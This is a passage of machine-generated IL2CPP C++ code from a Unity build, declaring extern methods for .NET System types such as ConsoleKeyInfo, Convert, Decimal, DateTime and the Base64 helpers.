ConsoleDriver_CreateTermInfoDriver_m93B83A6BC60910A8FDFA247BE56A30055E687342 (String_t* ___term0, const RuntimeMethod* method); // System.Void System.NullConsoleDriver::.ctor() extern "C" IL2CPP_METHOD_ATTR void NullConsoleDriver__ctor_mEF6695F8B8CEE021CD5EC693237034A53D484CB2 (NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D * __this, const RuntimeMethod* method); // System.Void System.WindowsConsoleDriver::.ctor() extern "C" IL2CPP_METHOD_ATTR void WindowsConsoleDriver__ctor_m9C9E675288391C478152CCB5789D7726611BF70D (WindowsConsoleDriver_t953AB92956013BD3ED7E260FEC4944E603008B42 * __this, const RuntimeMethod* method); // System.Void System.TermInfoDriver::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void TermInfoDriver__ctor_mDBF60028AEDAE114F1EC4FA8538F29B49AB11EF2 (TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653 * __this, String_t* ___term0, const RuntimeMethod* method); // System.Boolean System.ConsoleDriver::Isatty(System.IntPtr) extern "C" IL2CPP_METHOD_ATTR bool ConsoleDriver_Isatty_m61E5B553BD3DCEA32A5ECB06C14F638D980F8B37 (intptr_t ___handle0, const RuntimeMethod* method); // System.Void System.ConsoleKeyInfo::.ctor(System.Char,System.ConsoleKey,System.Boolean,System.Boolean,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void ConsoleKeyInfo__ctor_mF5F427F75CCD5D4BCAADCE6AE31F61D70BD95B98 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, Il2CppChar ___keyChar0, int32_t ___key1, bool ___shift2, bool ___alt3, bool ___control4, const RuntimeMethod* method); // System.Char System.ConsoleKeyInfo::get_KeyChar() extern "C" IL2CPP_METHOD_ATTR Il2CppChar ConsoleKeyInfo_get_KeyChar_m6B17C3F0DF650E04D7C0C081E063AE31E8C14509 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, const RuntimeMethod* method); // System.ConsoleKey System.ConsoleKeyInfo::get_Key() extern "C" IL2CPP_METHOD_ATTR int32_t ConsoleKeyInfo_get_Key_m36CD740D4C51FB4F4277AC7E6CD24D79DF5C8AC5 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, const RuntimeMethod* method); // System.Boolean System.ConsoleKeyInfo::Equals(System.ConsoleKeyInfo) extern "C" IL2CPP_METHOD_ATTR bool ConsoleKeyInfo_Equals_m856A0CCC02F22515A8D33AB4B574FC2E7D42C13B (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 ___obj0, const RuntimeMethod* method); // System.Boolean System.ConsoleKeyInfo::Equals(System.Object) extern "C" IL2CPP_METHOD_ATTR bool ConsoleKeyInfo_Equals_m81C3BF521051E75DDAFCC076087758659260B867 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, RuntimeObject * ___value0, const RuntimeMethod* method); // System.Int32 System.ConsoleKeyInfo::GetHashCode() extern "C" IL2CPP_METHOD_ATTR int32_t ConsoleKeyInfo_GetHashCode_mC17663E6043305F599B0AE2DC7534466C9CD6C28 (ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * __this, const RuntimeMethod* method); // System.Void System.MarshalByRefObject::.ctor() extern "C" IL2CPP_METHOD_ATTR void MarshalByRefObject__ctor_mD1C6F1D191B1A50DC93E8B214BCCA9BD93FDE850 (MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF * __this, const RuntimeMethod* method); // System.Void System.Attribute::.ctor() extern "C" IL2CPP_METHOD_ATTR void Attribute__ctor_m45CAD4B01265CC84CC5A84F62EE2DBE85DE89EC0 (Attribute_tF048C13FB3C8CFCC53F82290E4A3F621089F9A74 * __this, const RuntimeMethod* method); // System.Void System.InvalidCastException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812 (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * __this, String_t* ___message0, const RuntimeMethod* method); // System.Boolean System.Type::op_Equality(System.Type,System.Type) extern "C" IL2CPP_METHOD_ATTR bool Type_op_Equality_m7040622C9E1037EFC73E1F0EDB1DD241282BE3D8 (Type_t * ___left0, Type_t * ___right1, const RuntimeMethod* method); // System.Boolean System.RuntimeType::op_Inequality(System.RuntimeType,System.RuntimeType) extern "C" IL2CPP_METHOD_ATTR bool RuntimeType_op_Inequality_mA98A719712593FEE5DCCFDB47CCABDB58BEE1B0D (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___left0, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___right1, const RuntimeMethod* method); // System.Type System.Object::GetType() extern "C" IL2CPP_METHOD_ATTR Type_t * Object_GetType_m2E0B62414ECCAA3094B703790CE88CBB2F83EA60 (RuntimeObject * __this, const RuntimeMethod* method); // System.Boolean System.RuntimeType::op_Equality(System.RuntimeType,System.RuntimeType) extern "C" IL2CPP_METHOD_ATTR bool RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4 (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___left0, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___right1, const RuntimeMethod* method); // System.String System.Environment::GetResourceString(System.String,System.Object[]) extern "C" IL2CPP_METHOD_ATTR String_t* Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB (String_t* ___key0, ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ___values1, const RuntimeMethod* method); // System.Boolean System.Type::get_IsValueType() extern "C" IL2CPP_METHOD_ATTR bool Type_get_IsValueType_mDDCCBAE9B59A483CBC3E5C02E3D68CEBEB2E41A8 (Type_t * __this, const RuntimeMethod* method); // System.Boolean System.Boolean::Parse(System.String) extern "C" IL2CPP_METHOD_ATTR bool Boolean_Parse_m82CC57BC939797529A5CC485B6C26E8CE67A646F (String_t* ___value0, const RuntimeMethod* method); // System.Boolean System.Decimal::op_Inequality(System.Decimal,System.Decimal) extern "C" IL2CPP_METHOD_ATTR bool Decimal_op_Inequality_m18DB27574F40577B4D0D3C732BDA45135B41FD3D (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d10, Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d21, const RuntimeMethod* method); // System.Void System.OverflowException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731 (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * __this, String_t* ___message0, const RuntimeMethod* method); // System.Int32 System.String::get_Length() extern "C" IL2CPP_METHOD_ATTR int32_t String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018 (String_t* __this, const RuntimeMethod* method); // System.Void System.FormatException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14 (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * __this, String_t* ___message0, const RuntimeMethod* method); // System.Char System.String::get_Chars(System.Int32) extern "C" IL2CPP_METHOD_ATTR Il2CppChar String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96 (String_t* __this, int32_t ___index0, const RuntimeMethod* method); // System.SByte System.Convert::ToSByte(System.Double) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m286EC501DE7B1980DE30BBB28DDA70AE4BB696E5 (double ___value0, const RuntimeMethod* method); // System.Int32 System.Convert::ToInt32(System.Double) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C (double ___value0, const RuntimeMethod* method); // System.SByte System.Convert::ToSByte(System.Int32) extern "C" IL2CPP_METHOD_ATTR int8_t Convert_ToSByte_m65A58DC38CC3A2E7B1D2546EC2FE0803AAB03F34 (int32_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::Round(System.Decimal,System.Int32) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d0, int32_t ___decimals1, const RuntimeMethod* method); // System.SByte System.Decimal::ToSByte(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int8_t Decimal_ToSByte_m7AB199A01D92932483C3F2B1CA7C5C837758395D (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method); // System.SByte System.SByte::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int8_t SByte_Parse_m3CCD04AED0DC62F729DFA2FF45DA1E4C8BACDD60 (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Byte System.Convert::ToByte(System.Double) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_m91AFBFC15EA62AF9EA9826E3F777635C1E18F32C (double ___value0, const RuntimeMethod* method); // System.Byte System.Convert::ToByte(System.Int32) extern "C" IL2CPP_METHOD_ATTR uint8_t Convert_ToByte_mC952E2B42FF6008EF2123228A0BFB9054531EB64 (int32_t ___value0, const RuntimeMethod* method); // System.Byte System.Decimal::ToByte(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint8_t Decimal_ToByte_mE1A4E4DBE29BA89E812BA28BC7B637B849DC2526 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method); // System.Globalization.CultureInfo System.Globalization.CultureInfo::get_CurrentCulture() extern "C" IL2CPP_METHOD_ATTR CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * CultureInfo_get_CurrentCulture_mD86F3D8E5D332FB304F80D9B9CA4DE849C2A6831 (const RuntimeMethod* method); // System.Byte System.Byte::Parse(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t Byte_Parse_mEFBC459D6ADA0FED490539CD8731E45AE2D2587C (String_t* ___s0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.Byte System.Byte::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t Byte_Parse_mF53D7EFF3FC8B040EE675E62145287C7F728F772 (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Int16 System.Convert::ToInt16(System.Double) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m1F982FED72A4829E1DE1A64F162F13555FC1F7EC (double ___value0, const RuntimeMethod* method); // System.Int16 System.Convert::ToInt16(System.Int32) extern "C" IL2CPP_METHOD_ATTR int16_t Convert_ToInt16_m0D8DD7C5E5F85BE27D38E0FBD17411B8682618B3 (int32_t ___value0, const RuntimeMethod* method); // System.Int16 System.Decimal::ToInt16(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int16_t Decimal_ToInt16_mA2BB2FEA8CBAF4AB1AE4F3AD1F877B5A5DBA165C (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method); // System.Int16 System.Int16::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int16_t Int16_Parse_m8974BEBECCE6184E1A2CA312D637E40B731F49B2 (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.UInt16 System.Convert::ToUInt16(System.Double) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mC488D697C85EE1862D2D8FFFD30BC8E99AB73BE5 (double ___value0, const RuntimeMethod* method); // System.UInt16 System.Convert::ToUInt16(System.Int32) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7 (int32_t ___value0, const RuntimeMethod* method); // System.UInt16 System.Decimal::ToUInt16(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint16_t Decimal_ToUInt16_m549253A5DF0667C9938591FA692ACFE8D812C065 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method); // System.UInt16 System.UInt16::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint16_t UInt16_Parse_mEA6E086539E279750BCC41E5C9638C2514924E8B (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Int32 System.Decimal::FCallToInt32(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int32_t Decimal_FCallToInt32_m4B063BBD3E2F9CDA39F8C09A6E81C05567FC0C1A (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d0, const RuntimeMethod* method); // System.Int32 System.Int32::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int32_t Int32_Parse_m17BA45CC13A0E08712F2EE60CC1356291D0592AC (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.UInt32 System.Convert::ToUInt32(System.Double) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mB7F4B7176295B3AA240199C4C2E7E59C3B74E6AF (double ___value0, const RuntimeMethod* method); // System.UInt32 System.Decimal::ToUInt32(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint32_t Decimal_ToUInt32_mC664BD6ACBC5640F9CC3CCC40C7D1F39677D9E3A (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d0, const RuntimeMethod* method); // System.UInt32 System.UInt32::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint32_t UInt32_Parse_mEEC266AE3E2BA9F49F4CD5E69EBDA3A1B008E125 (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Int64 System.Convert::ToInt64(System.Double) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m64CA1F639893BC431286C0AE8266AA46E38FB57D (double ___value0, const RuntimeMethod* method); // System.Int64 System.Decimal::ToInt64(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int64_t Decimal_ToInt64_mB2D5CC63EDC9C99171ADA933FD133905D7FCCA72 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d0, const RuntimeMethod* method); // System.Int64 System.Int64::Parse(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t Int64_Parse_m58A1CEB948FDC6C2ECCA27CA9D19CB904BF98FD4 (String_t* ___s0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.Int64 System.Int64::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t Int64_Parse_m5113C0CCFB668DBC49D71D9F07CC8A96B8C7773D (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.UInt64 System.Convert::ToUInt64(System.Double) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mA246C8DD45C3EA0EFB21E3ED8B6EE6FAAE119232 (double ___value0, const RuntimeMethod* method); // System.UInt64 System.Decimal::ToUInt64(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint64_t Decimal_ToUInt64_mABC57AEE77C35B13F9FEE100D6DFF015A2CADBB5 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___d0, const RuntimeMethod* method); // System.UInt64 System.UInt64::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t UInt64_Parse_mBCA93243BACC50D7302706C914152213B8AB85A5 (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Single System.Decimal::op_Explicit(System.Decimal) extern "C" IL2CPP_METHOD_ATTR float Decimal_op_Explicit_mC7ED730AE7C6D42F19F06246B242E8B60EDDAC62 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method); // System.Single System.Single::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR float Single_Parse_m6D591682F5EF2ED4D1CEADF65728E965A739AE74 (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Double System.Decimal::op_Explicit(System.Decimal) extern "C" IL2CPP_METHOD_ATTR double Decimal_op_Explicit_mB7F34E3B2DFB6211CA5ACB5497DA6CDCB09FC6CE (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method); // System.Double System.Double::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR double Double_Parse_m52FA2C773282C04605DA871AC7093A66FA8A746B (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.SByte) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_m8519381573914335A82DE5D3D06FA85E89D89197 (int8_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.Byte) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_m466EC50EE380238E9F804EE13EF1A2EF7B310DC6 (uint8_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.Int16) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_m9A27DB673EFE87795196E83A6D91139A491252E6 (int16_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.UInt16) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_mEF0CA15B0C83BC57C2206E366FBAE3FF552FEF28 (uint16_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.Int32) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_m654C5710B68EAA7C5E606F28F084CE5FDA339415 (int32_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.UInt32) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_m2220445E5E4C0CC7715EEC07C0F7417097FD4141 (uint32_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.Int64) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_mFD66E10F50DE6B69A137279140DD74487572827D (int64_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Implicit(System.UInt64) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Implicit_m2C34640E22DCDAB44B7135AE81E8D480C0CCF556 (uint64_t ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Explicit(System.Single) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Explicit_m9AE85BFCE75391680A7D4EA28FF4D42959F37E39 (float ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::op_Explicit(System.Double) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_op_Explicit_m2EB423334931E2E5B03C2A91D98E1EB8E28FCC0A (double ___value0, const RuntimeMethod* method); // System.Decimal System.Decimal::Parse(System.String,System.Globalization.NumberStyles,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Decimal_Parse_mFA9697AFBA5C224F2F6D08275B904E9DDBFE607A (String_t* ___s0, int32_t ___style1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Void System.DateTime::.ctor(System.Int64) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___ticks0, const RuntimeMethod* method); // System.DateTime System.DateTime::Parse(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Parse_mFB11F5C0061CEAD9A2F51E3814DEBE0475F2BA37 (String_t* ___s0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.String System.Char::ToString(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* Char_ToString_mF758476EBA0494508C18E74ADF20D7732A872BDE (Il2CppChar* __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.String System.Int32::ToString(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* Int32_ToString_m1D0AF82BDAB5D4710527DD3FEFA6F01246D128A5 (int32_t* __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Int32 System.ParseNumbers::StringToInt(System.String,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t ParseNumbers_StringToInt_m4EB636CC7D3D970B1409CA4AA0336AB33B2DF39F (String_t* ___value0, int32_t ___fromBase1, int32_t ___flags2, const RuntimeMethod* method); // System.String System.Convert::ToBase64String(System.Byte[],System.Int32,System.Int32,System.Base64FormattingOptions) extern "C" IL2CPP_METHOD_ATTR String_t* Convert_ToBase64String_m86FF376EC650C7A6E85EDD7BCF5BEC23EE5402DF (ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___inArray0, int32_t ___offset1, int32_t ___length2, int32_t ___options3, const RuntimeMethod* method); // System.Int32 System.Convert::ToBase64_CalculateAndValidateOutputLength(System.Int32,System.Boolean) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToBase64_CalculateAndValidateOutputLength_m1FAAD592F5E302E59EAB90CB292DD02505C2A0E6 (int32_t ___inputLength0, bool ___insertLineBreaks1, const RuntimeMethod* method); // System.String System.String::FastAllocateString(System.Int32) extern "C" IL2CPP_METHOD_ATTR String_t* String_FastAllocateString_m41FF9F02E99463841990C6971132D4D9E320914C (int32_t ___length0, const RuntimeMethod* method); // System.Int32 System.Runtime.CompilerServices.RuntimeHelpers::get_OffsetToStringData() extern "C" IL2CPP_METHOD_ATTR int32_t RuntimeHelpers_get_OffsetToStringData_mF3B79A906181F1A2734590DA161E2AF183853F8B (const RuntimeMethod* method); // System.Int32 System.Convert::ConvertToBase64Array(System.Char*,System.Byte*,System.Int32,System.Int32,System.Boolean) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ConvertToBase64Array_m2C6DC2EA273DB7F37A3A25116F18AF6DB5192E3B (Il2CppChar* ___outChars0, uint8_t* ___inData1, int32_t ___offset2, int32_t ___length3, bool ___insertLineBreaks4, const RuntimeMethod* method); // System.Void System.OutOfMemoryException::.ctor() extern "C" IL2CPP_METHOD_ATTR void OutOfMemoryException__ctor_m4ED0B5B3F91BAF66BDF69E09EF6DC74777FE8DEB (OutOfMemoryException_t2DF3EAC178583BD1DEFAAECBEDB2AF1EA86FBFC7 * __this, const RuntimeMethod* method); // System.Byte[] System.Convert::FromBase64CharPtr(System.Char*,System.Int32) extern "C" IL2CPP_METHOD_ATTR ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* Convert_FromBase64CharPtr_mBE2FEB558FE590EDCC320D6B864726889274B451 (Il2CppChar* ___inputPtr0, int32_t ___inputLength1, const RuntimeMethod* method); // System.Int32 System.Convert::FromBase64_ComputeResultLength(System.Char*,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_FromBase64_ComputeResultLength_mEE0DB67C66BAFD2BD1738DF94FDDD571E182B622 (Il2CppChar* ___inputPtr0, int32_t ___inputLength1, const RuntimeMethod* method); // System.Int32 System.Convert::FromBase64_Decode(System.Char*,System.Int32,System.Byte*,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_FromBase64_Decode_mB5184595EE5894141A3943224A628FA9427DBB82 (Il2CppChar* ___startInputPtr0, int32_t ___inputLength1, uint8_t* ___startDestPtr2, int32_t ___destLength3, const RuntimeMethod* method); // System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) extern "C" IL2CPP_METHOD_ATTR Type_t * Type_GetTypeFromHandle_m9DC58ADF0512987012A8A016FB64B068F3B1AFF6 (RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D ___handle0, const RuntimeMethod* method); // System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) extern "C" IL2CPP_METHOD_ATTR void RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A (RuntimeArray * ___array0, RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF ___fldHandle1, const RuntimeMethod* method); // System.Void System.StringComparer::.ctor() extern "C" IL2CPP_METHOD_ATTR void StringComparer__ctor_mB32547253FAD35661634154EE51010A1BFA84142 (StringComparer_t588BC7FEF85D6E7425E0A8147A3D5A334F1F82DE * __this, const RuntimeMethod* method); // System.Int32 System.Globalization.CompareInfo::GetHashCodeOfString(System.String,System.Globalization.CompareOptions) extern "C" IL2CPP_METHOD_ATTR int32_t CompareInfo_GetHashCodeOfString_m91DE0691957416A2BBC9AADD8D4AE2A2885A5AB3 (CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * __this, String_t* ___source0, int32_t ___options1, const RuntimeMethod* method); // System.Void System.TimeZone::.ctor() extern "C" IL2CPP_METHOD_ATTR void TimeZone__ctor_mBD56855E65E61A15C21F434032207DF5469CEF31 (TimeZone_tA2DF435DA1A379978B885F0872A93774666B7454 * __this, const RuntimeMethod* method); // System.TimeZoneInfo System.TimeZoneInfo::get_Local() extern "C" IL2CPP_METHOD_ATTR TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * TimeZoneInfo_get_Local_mD208D43B3366D6E489CA49A7F21164373CEC24FD (const RuntimeMethod* method); // System.Void System.NotSupportedException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void NotSupportedException__ctor_mD023A89A5C1F740F43F0A9CD6C49DC21230B3CEE (NotSupportedException_tE75B318D6590A02A5D9B29FD97409B1750FA0010 * __this, String_t* ___message0, const RuntimeMethod* method); // System.Void System.UnitySerializationHolder::GetUnitySerializationInfo(System.Runtime.Serialization.SerializationInfo,System.Int32,System.String,System.Reflection.RuntimeAssembly) extern "C" IL2CPP_METHOD_ATTR void UnitySerializationHolder_GetUnitySerializationInfo_m86F654140996546DB4D6D8228BF9FE45E9BAEC3E (SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, int32_t ___unityType1, String_t* ___data2, RuntimeAssembly_t5EE9CD749D82345AE5635B9665665C31A3308EB1 * ___assembly3, const RuntimeMethod* method); // System.Object System.Convert::DefaultToType(System.IConvertible,System.Type,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3 (RuntimeObject* ___value0, Type_t * ___targetType1, RuntimeObject* ___provider2, const RuntimeMethod* method); // System.Void System.DBNull::.ctor() extern "C" IL2CPP_METHOD_ATTR void DBNull__ctor_m9A9476BA790C3C326D5322BDB552DBBD2DAD5996 (DBNull_t7400E04939C2C29699B389B106997892BF53A8E5 * __this, const RuntimeMethod* method); // System.Char System.DTSubString::get_Item(System.Int32) extern "C" IL2CPP_METHOD_ATTR Il2CppChar DTSubString_get_Item_mD569E347AE9009D19F72CF9A6AD2B202C9133F99 (DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D * __this, int32_t ___relativeIndex0, const RuntimeMethod* method); // System.Void System.DateTime::.ctor(System.UInt64) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m93DC89CED5AEEF1BFE4F5C194F2E36CB2C7F043E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, uint64_t ___dateData0, const RuntimeMethod* method); // System.Void System.ArgumentException::.ctor(System.String,System.String) extern "C" IL2CPP_METHOD_ATTR void ArgumentException__ctor_m26DC3463C6F3C98BF33EA39598DD2B32F0249CA8 (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * __this, String_t* ___message0, String_t* ___paramName1, const RuntimeMethod* method); // System.Void System.DateTime::.ctor(System.Int64,System.DateTimeKind) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___ticks0, int32_t ___kind1, const RuntimeMethod* method); // System.Void 